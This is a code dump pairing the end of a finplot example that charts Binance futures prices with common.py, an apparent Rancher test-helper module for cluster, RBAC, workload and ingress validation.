fplt.draw_done_color = '#555'
pg.setConfigOptions(foreground=fplt.foreground, background=fplt.background)
# control panel color
if ctrl_panel is not None:
p = ctrl_panel.palette()
p.setColor(ctrl_panel.darkmode.foregroundRole(), pg.mkColor(fplt.foreground))
ctrl_panel.darkmode.setPalette(p)
# window background
for win in fplt.windows:
win.setBackground(fplt.background)
# axis, crosshair, candlesticks, volumes
axs = [ax for win in fplt.windows for ax in win.axs]
vbs = set([ax.vb for ax in axs])
axs += fplt.overlay_axs
axis_pen = fplt._makepen(color=fplt.foreground)
for ax in axs:
ax.axes['left']['item'].setPen(axis_pen)
ax.axes['left']['item'].setTextPen(axis_pen)
ax.axes['bottom']['item'].setPen(axis_pen)
ax.axes['bottom']['item'].setTextPen(axis_pen)
if ax.crosshair is not None:
ax.crosshair.vline.pen.setColor(pg.mkColor(fplt.foreground))
ax.crosshair.hline.pen.setColor(pg.mkColor(fplt.foreground))
ax.crosshair.xtext.setColor(fplt.foreground)
ax.crosshair.ytext.setColor(fplt.foreground)
for item in ax.items:
if isinstance(item, fplt.FinPlotItem):
isvolume = ax in fplt.overlay_axs
if not isvolume:
item.colors.update(
dict(bull_shadow = fplt.candle_bull_color,
bull_frame = fplt.candle_bull_color,
bull_body = fplt.candle_bull_body_color,
bear_shadow = fplt.candle_bear_color,
bear_frame = fplt.candle_bear_color,
bear_body = fplt.candle_bear_color))
else:
item.colors.update(
dict(bull_frame = fplt.volume_bull_color,
bull_body = fplt.volume_bull_body_color,
bear_frame = fplt.volume_bear_color,
bear_body = fplt.volume_bear_color))
item.repaint()
def create_ctrl_panel(win):
panel = QWidget(win)
panel.move(100, 0)
win.scene().addWidget(panel)
layout = QtGui.QGridLayout(panel)
panel.symbol = QComboBox(panel)
[panel.symbol.addItem(i+'USDT') for i in 'BTC ETH XRP DOGE BNB SOL ADA LTC LINK DOT TRX BCH'.split()]
panel.symbol.setCurrentIndex(1)
layout.addWidget(panel.symbol, 0, 0)
panel.symbol.currentTextChanged.connect(change_asset)
layout.setColumnMinimumWidth(1, 30)
panel.interval = QComboBox(panel)
[panel.interval.addItem(i) for i in '1d 4h 1h 30m 15m 5m 1m'.split()]
panel.interval.setCurrentIndex(6)
layout.addWidget(panel.interval, 0, 2)
panel.interval.currentTextChanged.connect(change_asset)
layout.setColumnMinimumWidth(3, 30)
panel.indicators = QComboBox(panel)
[panel.indicators.addItem(i) for i in 'Clean:Few indicators:Moar indicators'.split(':')]
panel.indicators.setCurrentIndex(1)
layout.addWidget(panel.indicators, 0, 4)
panel.indicators.currentTextChanged.connect(change_asset)
layout.setColumnMinimumWidth(5, 30)
panel.darkmode = QCheckBox(panel)
panel.darkmode.setText('Haxxor mode')
panel.darkmode.setCheckState(2)
panel.darkmode.toggled.connect(dark_mode_toggle)
layout.addWidget(panel.darkmode, 0, 6)
return panel
plots = {}
fplt.y_pad = 0.07 # pad some extra (for control panel)
fplt.max_zoom_points = 7
fplt.autoviewrestore()
ax,ax_rsi = fplt.create_plot('Complicated Binance Futures Example', rows=2, init_zoom_periods=300)
axo = ax.overlay()
# use websocket for real-time
ws = BinanceFutureWebsocket()
# hide rsi chart to begin with; show x-axis of top plot
ax_rsi.hide()
ax_rsi.vb.setBackgroundColor(None) # don't use odd background color
ax.set_visible(xaxis=True)
ctrl_panel = create_ctrl_panel(ax.vb.win)
dark_mode_toggle(True)
change_asset()
fplt.timer_callback(realtime_update_plot, 1) # update every second
fplt.show()
|
common.py
|
from ..common import * # NOQA
import inspect
import json
import os
import random
import subprocess
import ssl
import time
import requests
import ast
import paramiko
import rancher
import pytest
from urllib.parse import urlparse
from rancher import ApiError
from lib.aws import AmazonWebServices
from copy import deepcopy
from threading import Lock
from threading import Thread
import websocket
import base64
DEFAULT_CATALOG_TIMEOUT = 15
DEFAULT_MONITORING_TIMEOUT = 180
DEFAULT_CLUSTER_STATE_TIMEOUT = 320
DEFAULT_MULTI_CLUSTER_APP_TIMEOUT = 300
DEFAULT_APP_DELETION_TIMEOUT = 360
DEFAULT_APP_V2_TIMEOUT = 60
CATTLE_API_URL = CATTLE_TEST_URL + "/v3"
CATTLE_AUTH_URL = \
CATTLE_TEST_URL + "/v3-public/localproviders/local?action=login"
DNS_REGEX = "(https*://)(.*[^/])"
USER_PASSWORD = os.environ.get('USER_PASSWORD', "None")
ADMIN_PASSWORD = os.environ.get('ADMIN_PASSWORD', "None")
kube_fname = os.path.join(os.path.dirname(os.path.realpath(__file__)),
"k8s_kube_config")
MACHINE_TIMEOUT = float(os.environ.get('RANCHER_MACHINE_TIMEOUT', "1200"))
HARDENED_CLUSTER = ast.literal_eval(
os.environ.get('RANCHER_HARDENED_CLUSTER', "False"))
TEST_OS = os.environ.get('RANCHER_TEST_OS', "linux")
TEST_IMAGE = os.environ.get(
'RANCHER_TEST_IMAGE', "ranchertest/mytestcontainer")
TEST_IMAGE_PORT = os.environ.get('RANCHER_TEST_IMAGE_PORT', "80")
TEST_IMAGE_NGINX = os.environ.get('RANCHER_TEST_IMAGE_NGINX', "nginx")
TEST_IMAGE_OS_BASE = os.environ.get('RANCHER_TEST_IMAGE_OS_BASE', "ubuntu")
if TEST_OS == "windows":
DEFAULT_TIMEOUT = 300
skip_test_windows_os = pytest.mark.skipif(
TEST_OS == "windows",
reason='Tests Skipped for including Windows nodes cluster')
skip_test_hardened = pytest.mark.skipif(
HARDENED_CLUSTER,
reason='Tests Skipped due to being a hardened cluster')
UPDATE_KDM = ast.literal_eval(os.environ.get('RANCHER_UPDATE_KDM', "False"))
KDM_URL = os.environ.get("RANCHER_KDM_URL", "")
CLUSTER_NAME = os.environ.get("RANCHER_CLUSTER_NAME", "")
RANCHER_CLEANUP_CLUSTER = \
ast.literal_eval(os.environ.get('RANCHER_CLEANUP_CLUSTER', "True"))
env_file = os.path.join(
os.path.dirname(os.path.realpath(__file__)),
"rancher_env.config")
AWS_SSH_KEY_NAME = os.environ.get("AWS_SSH_KEY_NAME")
AWS_ACCESS_KEY_ID = os.environ.get("AWS_ACCESS_KEY_ID")
AWS_SECRET_ACCESS_KEY = os.environ.get("AWS_SECRET_ACCESS_KEY")
AWS_REGION = os.environ.get("AWS_REGION")
AWS_SUBNET = os.environ.get("AWS_SUBNET")
AWS_VPC = os.environ.get("AWS_VPC")
AWS_SG = os.environ.get("AWS_SG")
AWS_ZONE = os.environ.get("AWS_ZONE")
AWS_IAM_PROFILE = os.environ.get("AWS_IAM_PROFILE", "")
AWS_S3_BUCKET_NAME = os.environ.get("AWS_S3_BUCKET_NAME", "")
AWS_S3_BUCKET_FOLDER_NAME = os.environ.get("AWS_S3_BUCKET_FOLDER_NAME", "")
LINODE_ACCESSKEY = os.environ.get('RANCHER_LINODE_ACCESSKEY', "None")
NFS_SERVER_MOUNT_PATH = "/nfs"
TEST_RBAC = ast.literal_eval(os.environ.get('RANCHER_TEST_RBAC', "False"))
if_test_rbac = pytest.mark.skipif(TEST_RBAC is False,
reason='rbac tests are skipped')
TEST_ALL_SNAPSHOT = ast.literal_eval(
os.environ.get('RANCHER_TEST_ALL_SNAPSHOT', "False")
)
if_test_all_snapshot = \
pytest.mark.skipif(TEST_ALL_SNAPSHOT is False,
reason='Snapshots check tests are skipped')
DATA_SUBDIR = os.path.join(os.path.dirname(os.path.realpath(__file__)),
'resource')
# As of release 2.4 default rke scan profile is "rke-cis-1.4"
CIS_SCAN_PROFILE = os.environ.get('RANCHER_CIS_SCAN_PROFILE', "rke-cis-1.4")
# here are all supported roles for RBAC testing
CLUSTER_MEMBER = "cluster-member"
CLUSTER_OWNER = "cluster-owner"
PROJECT_MEMBER = "project-member"
PROJECT_OWNER = "project-owner"
PROJECT_READ_ONLY = "read-only"
rbac_data = {
"project": None,
"namespace": None,
"workload": None,
"p_unshared": None,
"ns_unshared": None,
"wl_unshared": None,
"users": {
CLUSTER_OWNER: {},
CLUSTER_MEMBER: {},
PROJECT_OWNER: {},
PROJECT_MEMBER: {},
PROJECT_READ_ONLY: {},
}
}
auth_rbac_data = {
"project": None,
"namespace": None,
"users": {}
}
# here are the global role templates used for
# testing globalRoleBinding and groupRoleBinding
TEMPLATE_MANAGE_CATALOG = {
"newUserDefault": "false",
"rules": [
{
"type": "/v3/schemas/policyRule",
"apiGroups": [
"management.cattle.io"
],
"verbs": [
"*"
],
"resources": [
"catalogs",
"templates",
"templateversions"
]
}
],
"name": "gr-test-manage-catalog",
}
TEMPLATE_LIST_CLUSTER = {
"newUserDefault": "false",
"rules": [
{
"type": "/v3/schemas/policyRule",
"apiGroups": [
"management.cattle.io"
],
"verbs": [
"get",
"list",
"watch"
],
"resources": [
"clusters"
]
}
],
"name": "gr-test-list-cluster",
}
# this is used when testing users from an auth provider
AUTH_PROVIDER = os.environ.get('RANCHER_AUTH_PROVIDER', "")
if AUTH_PROVIDER not in ["activeDirectory", "freeIpa", "openLdap", ""]:
pytest.fail("Invalid RANCHER_AUTH_PROVIDER. Please provide one of: "
"activeDirectory, freeIpa, or openLdap (case sensitive).")
NESTED_GROUP_ENABLED = ast.literal_eval(
os.environ.get('RANCHER_NESTED_GROUP_ENABLED', "False"))
# Admin Auth username and the shared password for all auth users
AUTH_USER_PASSWORD = os.environ.get('RANCHER_AUTH_USER_PASSWORD', "")
# the link to log in as an auth user
LOGIN_AS_AUTH_USER_URL = \
CATTLE_TEST_URL + "/v3-public/" \
+ AUTH_PROVIDER + "Providers/" \
+ AUTH_PROVIDER.lower() + "?action=login"
CATTLE_AUTH_PRINCIPAL_URL = CATTLE_TEST_URL + "/v3/principals?action=search"
# This is used for nested groups when a third-party auth provider is enabled
nested_group = {
"auth_info": None,
"users": None,
"group_dic": None,
"groups": None
}
auth_requirements = not AUTH_PROVIDER or not AUTH_USER_PASSWORD
if_test_group_rbac = pytest.mark.skipif(
auth_requirements,
reason='Group RBAC tests are skipped.'
'Required AUTH env variables '
'have not been set.'
)
# -----------------------------------------------------------------------------
# global variables from test_create_ha.py
test_run_id = "test" + str(random.randint(10000, 99999))
RANCHER_HOSTNAME_PREFIX = os.environ.get("RANCHER_HOSTNAME_PREFIX",
test_run_id)
CERT_MANAGER_VERSION = os.environ.get("RANCHER_CERT_MANAGER_VERSION", "v1.0.1")
# -----------------------------------------------------------------------------
# this is used for testing rbac v2
test_rbac_v2 = os.environ.get("RANCHER_TEST_RBAC_V2", "False")
if_test_rbac_v2 = pytest.mark.skipif(test_rbac_v2 != "True",
reason='test for rbac v2 is skipped')
def is_windows(os_type=TEST_OS):
return os_type == "windows"
def get_cluster_client_for_token_v1(cluster_id, token):
url = CATTLE_TEST_URL + "/k8s/clusters/" + cluster_id + "/v1/schemas"
return rancher.Client(url=url, token=token, verify=False)
def get_admin_client():
return rancher.Client(url=CATTLE_API_URL, token=ADMIN_TOKEN, verify=False)
def get_user_client():
return rancher.Client(url=CATTLE_API_URL, token=USER_TOKEN, verify=False)
def get_client_for_token(token, url=CATTLE_API_URL):
return rancher.Client(url=url, token=token, verify=False)
def get_project_client_for_token(project, token):
p_url = project.links['self'] + '/schemas'
p_client = rancher.Client(url=p_url, token=token, verify=False)
return p_client
def get_cluster_client_for_token(cluster, token):
c_url = cluster.links['self'] + '/schemas'
c_client = rancher.Client(url=c_url, token=token, verify=False)
return c_client
def up(cluster, token):
c_url = cluster.links['self'] + '/schemas'
c_client = rancher.Client(url=c_url, token=token, verify=False)
return c_client
def wait_state(client, obj, state, timeout=DEFAULT_TIMEOUT):
wait_for(lambda: client.reload(obj).state == state, timeout)
return client.reload(obj)
def wait_for_condition(client, resource, check_function, fail_handler=None,
timeout=DEFAULT_TIMEOUT):
start = time.time()
resource = client.reload(resource)
while not check_function(resource):
if time.time() - start > timeout:
exceptionMsg = 'Timeout waiting for ' + resource.baseType + \
' to satisfy condition: ' + \
inspect.getsource(check_function)
if fail_handler:
exceptionMsg = exceptionMsg + fail_handler(resource)
raise Exception(exceptionMsg)
time.sleep(.5)
resource = client.reload(resource)
return resource
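# Illustrative usage sketch (comment only); assumes a resource object with a
# `state` field, e.g.:
#   cluster = wait_for_condition(client, cluster,
#                                lambda resource: resource.state == "active")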
def get_setting_value_by_name(name):
settings_url = CATTLE_API_URL + "/settings/" + name
head = {'Authorization': 'Bearer ' + ADMIN_TOKEN}
response = requests.get(settings_url, verify=False, headers=head)
return response.json()["value"]
# Return value is negative if v1 < v2, zero if v1 == v2 and positive if v1 > v2
def compare_versions(v1, v2):
if tuple(map(int, (v1.split(".")))) > tuple(map(int, (v2.split(".")))):
return 1
elif tuple(map(int, (v1.split(".")))) < tuple(map(int, (v2.split(".")))):
return -1
else:
return 0
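# For example, compare_versions("2.10.1", "2.9") returns 1, because the
# version strings are compared as integer tuples: (2, 10, 1) > (2, 9).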
def create_project_and_ns(token, cluster, project_name=None, ns_name=None):
server_url = cluster.links['self'].split("/clusters")[0]
client = get_client_for_token(token, server_url)
p = create_project(client, cluster, project_name)
c_client = get_cluster_client_for_token(cluster, token)
ns = create_ns(c_client, cluster, p, ns_name)
return p, ns
def create_project(client, cluster, project_name=None):
if project_name is None:
project_name = random_name()
p = client.create_project(name=project_name,
clusterId=cluster.id)
time.sleep(5)
p = wait_until_available(client, p)
assert p.state == 'active'
return p
def create_project_with_pspt(client, cluster, pspt):
p = client.create_project(name=random_name(),
clusterId=cluster.id)
p = wait_until_available(client, p)
assert p.state == 'active'
return set_pspt_for_project(p, client, pspt)
def set_pspt_for_project(project, client, pspt):
project.setpodsecuritypolicytemplate(podSecurityPolicyTemplateId=pspt.id)
project = wait_until_available(client, project)
assert project.state == 'active'
return project
def create_ns(client, cluster, project, ns_name=None):
if ns_name is None:
ns_name = random_name()
ns = client.create_namespace(name=ns_name,
clusterId=cluster.id,
projectId=project.id)
wait_for_ns_to_become_active(client, ns)
ns = client.reload(ns)
assert ns.state == 'active'
return ns
def assign_members_to_cluster(client, user, cluster, role_template_id):
crtb = client.create_cluster_role_template_binding(
clusterId=cluster.id,
roleTemplateId=role_template_id,
subjectKind="User",
userId=user.id)
return crtb
def assign_members_to_project(client, user, project, role_template_id):
prtb = client.create_project_role_template_binding(
projectId=project.id,
roleTemplateId=role_template_id,
subjectKind="User",
userId=user.id)
return prtb
def change_member_role_in_cluster(client, user, crtb, role_template_id):
client.delete(crtb)
crtb = client.create_cluster_role_template_binding(
clusterId=crtb.clusterId,
roleTemplateId=role_template_id,
subjectKind="User",
userId=user.id
)
return crtb
def change_member_role_in_project(client, user, prtb, role_template_id):
client.delete(prtb)
prtb = client.create_project_role_template_binding(
projectId=prtb.projectId,
roleTemplateId=role_template_id,
subjectKind="User",
userId=user.id
)
return prtb
def create_kubeconfig(cluster, file_name=kube_fname):
generateKubeConfigOutput = cluster.generateKubeconfig()
print(generateKubeConfigOutput.config)
file = open(file_name, "w")
file.write(generateKubeConfigOutput.config)
file.close()
def validate_psp_error_worklaod(p_client, workload, error_message):
workload = wait_for_wl_transitioning(p_client, workload)
assert workload.state == "updating"
assert workload.transitioning == "error"
print(workload.transitioningMessage)
assert error_message in workload.transitioningMessage
def validate_all_workload_image_from_rancher(project_client, ns, pod_count=1,
ignore_pod_count=False,
deployment_list=None,
daemonset_list=None,
cronjob_list=None, job_list=None):
if cronjob_list is None:
cronjob_list = []
if daemonset_list is None:
daemonset_list = []
if deployment_list is None:
deployment_list = []
if job_list is None:
job_list = []
workload_list = deployment_list + daemonset_list + cronjob_list + job_list
wls = [dep.name for dep in project_client.list_workload(
namespaceId=ns.id).data]
assert len(workload_list) == len(wls), \
"Expected {} workload(s) to be present in {} namespace " \
"but there were {}".format(len(workload_list), ns.name, len(wls))
for workload_name in workload_list:
workloads = project_client.list_workload(name=workload_name,
namespaceId=ns.id).data
assert len(workloads) == workload_list.count(workload_name), \
"Expected {} workload(s) to be present with name {} " \
"but there were {}".format(workload_list.count(workload_name),
workload_name, len(workloads))
for workload in workloads:
for container in workload.containers:
assert str(container.image).startswith("rancher/")
if workload_name in deployment_list:
validate_workload(project_client, workload, "deployment",
ns.name, pod_count=pod_count,
ignore_pod_count=ignore_pod_count)
deployment_list.remove(workload_name)
if workload_name in daemonset_list:
validate_workload(project_client, workload, "daemonSet",
ns.name, pod_count=pod_count,
ignore_pod_count=ignore_pod_count)
daemonset_list.remove(workload_name)
if workload_name in cronjob_list:
validate_workload(project_client, workload, "cronJob",
ns.name, pod_count=pod_count,
ignore_pod_count=ignore_pod_count)
cronjob_list.remove(workload_name)
if workload_name in job_list:
validate_workload(project_client, workload, "job",
ns.name, pod_count=pod_count,
ignore_pod_count=ignore_pod_count)
job_list.remove(workload_name)
# Final assertion to ensure all expected workloads have been validated
assert not deployment_list + daemonset_list + cronjob_list
def validate_workload(p_client, workload, type, ns_name, pod_count=1,
wait_for_cron_pods=60, ignore_pod_count=False):
workload = wait_for_wl_to_active(p_client, workload)
assert workload.state == "active"
# For cronjob, wait for the first pod to get created after the
# scheduled wait time
if type == "cronJob":
time.sleep(wait_for_cron_pods)
if ignore_pod_count:
pods = p_client.list_pod(workloadId=workload.id).data
else:
pods = wait_for_pods_in_workload(p_client, workload, pod_count)
assert len(pods) == pod_count
pods = p_client.list_pod(workloadId=workload.id).data
assert len(pods) == pod_count
for pod in pods:
if type == "job":
job_type = True
expected_status = "Succeeded"
else:
job_type = False
expected_status = "Running"
p = wait_for_pod_to_running(p_client, pod, job_type=job_type)
assert p["status"]["phase"] == expected_status
wl_result = execute_kubectl_cmd(
"get " + type + " " + workload.name + " -n " + ns_name)
if type == "deployment" or type == "statefulSet":
assert wl_result["status"]["readyReplicas"] == len(pods)
if type == "daemonSet":
assert wl_result["status"]["currentNumberScheduled"] == len(pods)
if type == "cronJob":
assert len(wl_result["status"]["active"]) >= len(pods)
if type == "job":
assert wl_result["status"]["succeeded"] == len(pods)
def validate_workload_with_sidekicks(p_client, workload, type, ns_name,
pod_count=1):
workload = wait_for_wl_to_active(p_client, workload)
assert workload.state == "active"
pods = wait_for_pods_in_workload(p_client, workload, pod_count)
assert len(pods) == pod_count
for pod in pods:
wait_for_pod_to_running(p_client, pod)
wl_result = execute_kubectl_cmd(
"get " + type + " " + workload.name + " -n " + ns_name)
assert wl_result["status"]["readyReplicas"] == pod_count
for key, value in workload.workloadLabels.items():
label = key + "=" + value
get_pods = "get pods -l" + label + " -n " + ns_name
execute_kubectl_cmd(get_pods)
pods_result = execute_kubectl_cmd(get_pods)
assert len(pods_result["items"]) == pod_count
for pod in pods_result["items"]:
assert pod["status"]["phase"] == "Running"
assert len(pod["status"]["containerStatuses"]) == 2
assert "running" in pod["status"]["containerStatuses"][0]["state"]
assert "running" in pod["status"]["containerStatuses"][1]["state"]
def validate_workload_paused(p_client, workload, expectedstatus):
workloadStatus = p_client.list_workload(uuid=workload.uuid).data[0].paused
assert workloadStatus == expectedstatus
def validate_pod_images(expectedimage, workload, ns_name):
for key, value in workload.workloadLabels.items():
label = key + "=" + value
get_pods = "get pods -l" + label + " -n " + ns_name
pods = execute_kubectl_cmd(get_pods)
for pod in pods["items"]:
assert pod["spec"]["containers"][0]["image"] == expectedimage
def validate_pods_are_running_by_id(expectedpods, workload, ns_name):
for key, value in workload.workloadLabels.items():
label = key + "=" + value
get_pods = "get pods -l" + label + " -n " + ns_name
pods = execute_kubectl_cmd(get_pods)
curpodnames = []
for pod in pods["items"]:
curpodnames.append(pod["metadata"]["name"])
for expectedpod in expectedpods["items"]:
assert expectedpod["metadata"]["name"] in curpodnames
def validate_workload_image(client, workload, expectedImage, ns):
workload = client.list_workload(uuid=workload.uuid).data[0]
assert workload.containers[0].image == expectedImage
validate_pod_images(expectedImage, workload, ns.name)
def execute_kubectl_cmd(cmd, json_out=True, stderr=False,
kubeconfig=kube_fname):
command = 'kubectl --kubeconfig {0} {1}'.format(
kubeconfig, cmd)
if json_out:
command += ' -o json'
print("run cmd: \t{0}".format(command))
if stderr:
result = run_command_with_stderr(command, False)
else:
result = run_command(command, False)
print("returns: \t{0}".format(result))
if json_out:
result = json.loads(result)
return result
def run_command(command, log_out=True):
if log_out:
print("run cmd: \t{0}".format(command))
try:
return subprocess.check_output(command, shell=True, text=True)
    except subprocess.CalledProcessError:
        return None
def run_command_with_stderr(command, log_out=True):
if log_out:
print("run cmd: \t{0}".format(command))
try:
output = subprocess.check_output(command, shell=True,
stderr=subprocess.PIPE)
returncode = 0
except subprocess.CalledProcessError as e:
output = e.stderr
returncode = e.returncode
if log_out:
print("return code: \t{0}".format(returncode))
if returncode != 0:
print("output: \t{0}".format(output))
return output
def wait_for_wl_to_active(client, workload, timeout=DEFAULT_TIMEOUT):
start = time.time()
workloads = client.list_workload(uuid=workload.uuid).data
assert len(workloads) == 1
wl = workloads[0]
while wl.state != "active":
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for state to get to active")
time.sleep(.5)
workloads = client.list_workload(uuid=workload.uuid).data
assert len(workloads) == 1
wl = workloads[0]
return wl
def wait_for_ingress_to_active(client, ingress, timeout=DEFAULT_TIMEOUT):
start = time.time()
ingresses = client.list_ingress(uuid=ingress.uuid).data
assert len(ingresses) == 1
wl = ingresses[0]
while wl.state != "active":
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for state to get to active")
time.sleep(.5)
ingresses = client.list_ingress(uuid=ingress.uuid).data
assert len(ingresses) == 1
wl = ingresses[0]
return wl
def wait_for_wl_transitioning(client, workload, timeout=DEFAULT_TIMEOUT,
state="error"):
start = time.time()
workloads = client.list_workload(uuid=workload.uuid).data
assert len(workloads) == 1
wl = workloads[0]
while wl.transitioning != state:
if time.time() - start > timeout:
            raise AssertionError(
                "Timed out waiting for workload transitioning state "
                "to get to {}".format(state))
time.sleep(.5)
workloads = client.list_workload(uuid=workload.uuid).data
assert len(workloads) == 1
wl = workloads[0]
return wl
def wait_for_pod_to_running(client, pod, timeout=DEFAULT_TIMEOUT, job_type=False):
start = time.time()
pods = client.list_pod(uuid=pod.uuid).data
assert len(pods) == 1
p = pods[0]
if job_type:
expected_state = "succeeded"
else:
expected_state = "running"
while p.state != expected_state:
if time.time() - start > timeout:
            raise AssertionError(
                "Timed out waiting for pod state to get to "
                "{}".format(expected_state))
time.sleep(.5)
pods = client.list_pod(uuid=pod.uuid).data
assert len(pods) == 1
p = pods[0]
return p
def get_schedulable_nodes(cluster, client=None, os_type=TEST_OS):
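    """Return the cluster nodes that pods can be scheduled on: nodes that
    are not marked unschedulable, carry no NoSchedule/NoExecute taints
    (PreferNoSchedule is tolerated) and match the requested OS label."""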
if not client:
client = get_user_client()
nodes = client.list_node(clusterId=cluster.id).data
schedulable_nodes = []
for node in nodes:
if not node.unschedulable:
shouldSchedule = True
# node.taints doesn't exist if the node has no taints.
try:
for tval in node.taints:
if str(tval).find("PreferNoSchedule") == -1:
if str(tval).find("NoExecute") > -1 or str(tval).find("NoSchedule") > -1:
shouldSchedule = False
break
except AttributeError:
pass
if not shouldSchedule:
continue
for key, val in node.labels.items():
# Either one of the labels should be present on the node
if key == 'kubernetes.io/os' or key == 'beta.kubernetes.io/os':
if val == os_type:
schedulable_nodes.append(node)
break
return schedulable_nodes
def get_etcd_nodes(cluster, client=None):
if not client:
client = get_user_client()
nodes = client.list_node(clusterId=cluster.id).data
etcd_nodes = []
for node in nodes:
if node.etcd:
etcd_nodes.append(node)
return etcd_nodes
def get_role_nodes(cluster, role, client=None):
etcd_nodes = []
control_nodes = []
worker_nodes = []
node_list = []
if not client:
client = get_user_client()
nodes = client.list_node(clusterId=cluster.id).data
for node in nodes:
if node.etcd:
etcd_nodes.append(node)
if node.controlPlane:
control_nodes.append(node)
if node.worker:
worker_nodes.append(node)
if role == "etcd":
node_list = etcd_nodes
if role == "control":
node_list = control_nodes
if role == "worker":
node_list = worker_nodes
return node_list
def validate_ingress(p_client, cluster, workloads, host, path,
insecure_redirect=False):
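    """Curl the ingress host/path on every schedulable Linux node and
    verify the responses come from the given workloads' pods."""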
time.sleep(10)
curl_args = " "
    if insecure_redirect:
curl_args = " -L --insecure "
if len(host) > 0:
curl_args += " --header 'Host: " + host + "'"
nodes = get_schedulable_nodes(cluster, os_type="linux")
target_name_list = get_target_names(p_client, workloads)
for node in nodes:
host_ip = resolve_node_ip(node)
url = "http://" + host_ip + path
if not insecure_redirect:
wait_until_ok(url, timeout=300, headers={
"Host": host
})
cmd = curl_args + " " + url
validate_http_response(cmd, target_name_list)
def validate_ingress_using_endpoint(p_client, ingress, workloads,
timeout=300,
certcheck=False, is_insecure=False):
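    """Wait for the ingress to publish a public endpoint, then verify the
    endpoint URL serves responses from the given workloads' pods."""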
target_name_list = get_target_names(p_client, workloads)
start = time.time()
fqdn_available = False
url = None
while not fqdn_available:
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for endpoint to be available")
time.sleep(.5)
ingress_list = p_client.list_ingress(uuid=ingress.uuid).data
assert len(ingress_list) == 1
ingress = ingress_list[0]
if hasattr(ingress, 'publicEndpoints'):
for public_endpoint in ingress.publicEndpoints:
if public_endpoint["hostname"].startswith(ingress.name) \
or certcheck:
fqdn_available = True
url = \
public_endpoint["protocol"].lower() + "://" + \
public_endpoint["hostname"]
if "path" in public_endpoint.keys():
url += public_endpoint["path"]
time.sleep(10)
validate_http_response(url, target_name_list, insecure=is_insecure)
def get_target_names(p_client, workloads):
pods = []
for workload in workloads:
pod_list = p_client.list_pod(workloadId=workload.id).data
pods.extend(pod_list)
target_name_list = []
for pod in pods:
target_name_list.append(pod.name)
print("target name list:" + str(target_name_list))
return target_name_list
def get_endpoint_url_for_workload(p_client, workload, timeout=600):
fqdn_available = False
url = ""
start = time.time()
while not fqdn_available:
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for endpoint to be available")
time.sleep(.5)
workload_list = p_client.list_workload(uuid=workload.uuid).data
assert len(workload_list) == 1
workload = workload_list[0]
if hasattr(workload, 'publicEndpoints'):
assert len(workload.publicEndpoints) > 0
url = "http://"
url = url + workload.publicEndpoints[0]["addresses"][0] + ":"
url = url + str(workload.publicEndpoints[0]["port"])
fqdn_available = True
return url
def wait_until_lb_is_active(url, timeout=300):
start = time.time()
while check_for_no_access(url):
time.sleep(.5)
print("No access yet")
if time.time() - start > timeout:
raise Exception('Timed out waiting for LB to become active')
return
def check_for_no_access(url, verify=False):
try:
requests.get(url, verify=verify)
return False
except requests.ConnectionError:
print("Connection Error - " + url)
return True
def wait_until_active(url, timeout=120):
start = time.time()
while check_for_no_access(url):
time.sleep(.5)
print("No access yet")
if time.time() - start > timeout:
raise Exception('Timed out waiting for url '
'to become active')
return
def wait_until_ok(url, timeout=120, headers={}):
start = time.time()
while not check_if_ok(url, headers=headers):
time.sleep(.5)
if time.time() - start > timeout:
raise Exception(
'Timed out waiting for {0} to become ok'.format(url)
)
return
def wait_for_status_code(url, expected_code=200, timeout=DEFAULT_TIMEOUT):
start = time.time()
r = requests.get(url, verify=False)
while r.status_code != expected_code:
time.sleep(1)
r = requests.get(url, verify=False)
if time.time() - start > timeout:
raise Exception(
'Timed out waiting for status code {0}'
', actual code {1}'.format(
expected_code, r.status_code
)
)
return
def check_if_ok(url, verify=False, headers={}):
try:
res = requests.head(url, verify=verify, headers=headers)
if res.status_code == 200:
return True
return False
except requests.ConnectionError:
print("Connection Error - " + url)
return False
def validate_http_response(cmd, target_name_list, client_pod=None,
insecure=False):
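    """Repeatedly request the given URL (or curl argument string), either
    locally via curl or from client_pod via wget/PowerShell, until a
    response has been seen from every pod named in target_name_list."""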
if client_pod is None and cmd.startswith("http://"):
wait_until_active(cmd, 60)
target_hit_list = target_name_list[:]
    while len(target_hit_list) != 0:
if client_pod is None:
curl_cmd = "curl " + cmd
if insecure:
curl_cmd += "\t--insecure"
result = run_command(curl_cmd)
else:
if is_windows():
wget_cmd = 'powershell -NoLogo -NonInteractive -Command ' \
'"& {{ (Invoke-WebRequest -UseBasicParsing -Uri ' \
'{0}).Content }}"'.format(cmd)
else:
wget_cmd = "wget -qO- " + cmd
time.sleep(6)
result = kubectl_pod_exec(client_pod, wget_cmd)
result = result.decode()
if result is not None:
result = result.rstrip()
assert result in target_name_list
if result in target_hit_list:
target_hit_list.remove(result)
print("After removing all, the rest is: ", target_hit_list)
assert len(target_hit_list) == 0
def validate_cluster(client, cluster, intermediate_state="provisioning",
check_intermediate_state=True, skipIngresscheck=True,
nodes_not_in_active_state=[], k8s_version="",
userToken=USER_TOKEN, timeout=MACHINE_TIMEOUT):
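    """Validate that the cluster converges to active: wait for the cluster
    and its nodes, check the Kubernetes version and system workloads, then
    deploy a daemonSet as a smoke test and, unless skipIngresscheck is
    True, verify service discovery and ingress for it."""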
# Allow sometime for the "cluster_owner" CRTB to take effect
time.sleep(5)
cluster = validate_cluster_state(
client, cluster,
check_intermediate_state=check_intermediate_state,
intermediate_state=intermediate_state,
nodes_not_in_active_state=nodes_not_in_active_state,
timeout=timeout)
create_kubeconfig(cluster)
if k8s_version != "":
check_cluster_version(cluster, k8s_version)
if hasattr(cluster, 'rancherKubernetesEngineConfig'):
check_cluster_state(len(get_role_nodes(cluster, "etcd", client)))
# check all workloads under the system project are active
# wait for workloads to be active
# time.sleep(DEFAULT_TIMEOUT)
print("checking if workloads under the system project are active")
sys_project = client.list_project(name='System',
clusterId=cluster.id).data[0]
sys_p_client = get_project_client_for_token(sys_project, userToken)
for wl in sys_p_client.list_workload().data:
"""to help run KDM job faster (when there are many clusters),
timeout=300 is set"""
wait_for_wl_to_active(sys_p_client, wl, timeout=300)
# Create Daemon set workload and have an Ingress with Workload
# rule pointing to this daemonSet
project, ns = create_project_and_ns(userToken, cluster)
p_client = get_project_client_for_token(project, userToken)
con = [{"name": "test1",
"image": TEST_IMAGE}]
name = random_test_name("default")
workload = p_client.create_workload(name=name,
containers=con,
namespaceId=ns.id,
daemonSetConfig={})
validate_workload(p_client, workload, "daemonSet", ns.name,
